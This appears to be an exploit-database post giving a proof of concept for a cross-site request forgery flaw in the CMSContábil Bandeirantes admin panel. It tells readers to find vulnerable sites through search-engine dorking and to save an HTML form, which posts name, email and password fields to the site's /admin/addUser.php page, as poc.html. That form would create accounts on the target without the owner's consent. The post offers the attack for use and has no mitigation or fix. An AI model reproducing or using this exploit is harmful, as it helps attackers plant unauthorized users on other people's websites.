Share
## https://sploitus.com/exploit?id=PACKETSTORM:173677
======================================================================================================================================  
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |  
| # Vendor : https://scriptmafia.org/ |   
======================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] Go to the line 12.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /admin/addUser.php   
  
[+] Save code as poc.html   
  
<section id="main" class="column" style="height: 680px;">  
  
<h4 class="alert_info">Necessário preencher todos os campos.</h4>  
<!--<h4 class="alert_warning">A Warning Alert</h4>  
  
<h4 class="alert_error">An Error Message</h4>  
  
<h4 class="alert_success">A Success Message</h4>-->  
  
  
<article class="module width_full">  
<form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
<header><h3>Adicionar Usuários</h3></header>  
  
<div class="module_content">  
<fieldset>  
<label>Nome</label>  
<input name="nome" id="nome" value="" type="text">  
</fieldset>  
<fieldset>  
<label>Email</label>  
<input name="email" id="email" value="" type="text">  
</fieldset>  
<fieldset>  
<label>Senha</label>  
<input name="senha" id="senha" value="" type="text">  
</fieldset>  
<div class="clear"></div>  
</div>   
<footer>  
<div class="submit_link">  
<input id="limpar" name="limpar" value="limpar" type="submit">  
<input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
</div>  
</footer>  
</form>   
</article><!-- end of post new article -->  
  
  
  
  
<div class="spacer"></div>  
</section>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================